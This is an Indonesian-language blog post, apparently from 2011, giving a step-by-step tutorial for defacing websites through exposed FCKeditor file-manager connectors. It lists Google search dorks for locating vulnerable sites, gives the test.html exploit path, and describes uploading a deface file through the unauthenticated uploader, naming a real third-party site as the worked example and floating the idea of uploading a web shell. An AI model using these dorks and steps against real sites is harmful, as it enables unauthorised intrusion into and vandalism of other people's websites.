[+] exploit
http://site/[patch]/fckeditor/editor/filemanager/connectors/test.html
OK kali ini saya akan memberikan tutorial deface paling gampang yang baru saya temukan di tanggal 5 janury 2011
Sebenranya banyak cara deface.. apa lagi php nuke sangat banyak bug nya
Ga ada SS karma ini sangat gampang..
“Just Deface”
=======================
[+] langkah pertama [+]
=======================
Langkah pertama yang hasrus kita lakukan seperti biasa juga..
Nnya dulu sama si google
Dork..
Inurl:Masukin dork
Inurl: fckeditor/editor/
Inurl:filemanager/connectors/ site:.my
inurl:connectors/uploadtest.html site:.my :P
udah blom?
Heheh
OK seep.. lanjut..
Buka site nya..
Kali ini saya coba site
http://www.slfc.net.cn
=======================
[+] langkah ke dua [+]
=======================
OK lanjut..
Masukin exploitnya
Jadinya kayak gini
http://www.slfc.net.cn/php/FCKeditor/edi.../test.html
SS
=======================
[+] langkah ke tiga [+]
=======================
Nah, kalo udah muncul yang kayak gitu udah pada tau kan..?
Sama seperti tutor ecommerce
OK, pilih php,,
Pilih file defacean kita
Upload..
Kalo keluar kotak dialog bertuliskan “file uploade with no errors” berrti berhasil
========================
[+] langkah ke empat [+]
========================
Cari file uploadtan kita..
Klik get folder and files..
untuk contoh ini ada di
"/php/userfiles/file/"
jadinya
demo: http://localshost/php/userfiles/file/[file kamu]
ex : http://www.slfc.net.cn/php/userfiles/file/hn.txt
Nah.. sekarang lihat url file kita tadi,, seep..
But just deface..
NB: Mungkin ini masih bisa di kembangkkan lagi.. untuk upload shell dengan memanipulasi file.. tapi saya belum berhasil karna saya masih newbie
Always With US BeaCheater
0 komentar:
Posting Komentar